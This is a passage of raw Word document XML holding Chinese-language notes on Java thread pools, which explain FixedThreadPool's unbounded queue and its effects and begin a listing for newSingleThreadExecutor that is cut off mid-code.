      <w:r w:rsidR="0068549A" w:rsidRPr="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>FixedThreadPool</w:t>
      </w:r>
      <w:r w:rsidR="0068549A" w:rsidRPr="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>使用无界队列做为线程池的工作队里</w:t>
      </w:r>
      <w:r w:rsidR="0068549A" w:rsidRPr="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="0068549A" w:rsidRPr="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>队列容量为</w:t>
      </w:r>
      <w:r w:rsidR="0068549A" w:rsidRPr="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Integer.MAX_VALUE)</w:t>
      </w:r>
      <w:r w:rsidR="0068549A" w:rsidRPr="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，会带来以下影响：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068549A" w:rsidRPr="00951658" w:rsidRDefault="00D978DF" w:rsidP="00951658">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0068549A" w:rsidRPr="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>线程池中的线程数目不会超过核心线程数目</w:t>
      </w:r>
      <w:r w:rsidR="0068549A" w:rsidRPr="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>corePoolSize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068549A" w:rsidRPr="00951658" w:rsidRDefault="00D978DF" w:rsidP="00951658">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0068549A" w:rsidRPr="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>maximumPoolSize</w:t>
      </w:r>
      <w:r w:rsidR="0068549A" w:rsidRPr="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>是一个无效参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068549A" w:rsidRPr="00951658" w:rsidRDefault="00D978DF" w:rsidP="00951658">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0068549A" w:rsidRPr="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>keepAliveTime</w:t>
      </w:r>
      <w:r w:rsidR="0068549A" w:rsidRPr="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>将是一个无效参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00375238" w:rsidRPr="00951658" w:rsidRDefault="00D978DF" w:rsidP="00951658">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00375238" w:rsidRPr="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>使用无界队列，</w:t>
      </w:r>
      <w:r w:rsidR="00375238" w:rsidRPr="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>FixedThreadPool</w:t>
      </w:r>
      <w:r w:rsidR="00375238" w:rsidRPr="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>不会拒绝任务。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068549A" w:rsidRPr="00375238" w:rsidRDefault="0068549A" w:rsidP="00375238">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="00E64E39" w:rsidP="008632FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidR="008632FA" w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ExecutorService newSingleThreadExecutor()</w:t>
      </w:r>
      <w:r w:rsidR="008632FA" w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>：单线程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="008632FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="008632FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>可以看到，与</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fixedThreadPool</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>很像</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，只不过</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fixedThreadPool</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中的入参直接退化为</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="008632FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="008632FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="108AC6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="135255"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="231" name="图片 4" descr="收藏代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId22" tooltip="&quot;收藏这段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收藏代码">
                      <a:hlinkClick r:id="rId22" tooltip="&quot;收藏这段代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="142875" cy="135255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="6" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="589"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> ExecutorService newSingleThreadExecutor() {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="6" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="589"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> FinalizableDelegatedExecutorService  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:pBdr>
